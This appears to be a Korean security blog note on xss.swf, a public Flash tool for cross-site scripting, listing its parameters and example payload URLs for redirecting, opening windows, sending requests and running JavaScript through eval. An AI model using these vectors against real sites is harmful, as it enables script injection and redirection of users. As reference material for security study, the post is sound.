XSS using a Flash SWF
xss.zipa tiny tool for swf hacking, just browse it:)
param&value:
a(action) - c(cmd)
1.location to url: xss.swf?a=location&c=http://www.google.com/
2.open url to new window: xss.swf?a=open&c=http://www.google.com/
3.http request to url: xss.swf?a=get&c=http://www.google.com/
4.eval js codz: xss.swf?a=eval&c=alert(document.domain)
--------------------------------------------------------------------------------
localhost/xss.swf?a=location&c=http://www.google.com/
※ 출처
https://github.com/evilcos/xss.swf
※ 참고자료
http://panchocosil.blogspot.kr/2013/07/swf-file-preview-at-googlegroupscom.html
http://donncha.is/2013/06/coinbase-owning-a-bitcoin-exchange-bug-bounty-program/
http://erlend.oftedal.no/blog/?blogid=99
http://www.exploit-db.com/
'30. > 31. Web' 카테고리의 다른 글
| The Hacker Firefox (0) | 2014.04.17 |
|---|---|
| 22. 세션고정(SF) 취약점 (0) | 2014.04.16 |
| [DVWA] Damn Vulnerable Web Application 설치 (1) | 2014.02.05 |
| 인터넷 익스플로러에서 프록시 서버를 통한 설정 후, 직접 통신 (0) | 2013.12.04 |
| [SSL Proxy/Charles] iPhone, iPad의 SSL 네트워크 트레픽 확인. (0) | 2013.10.22 |
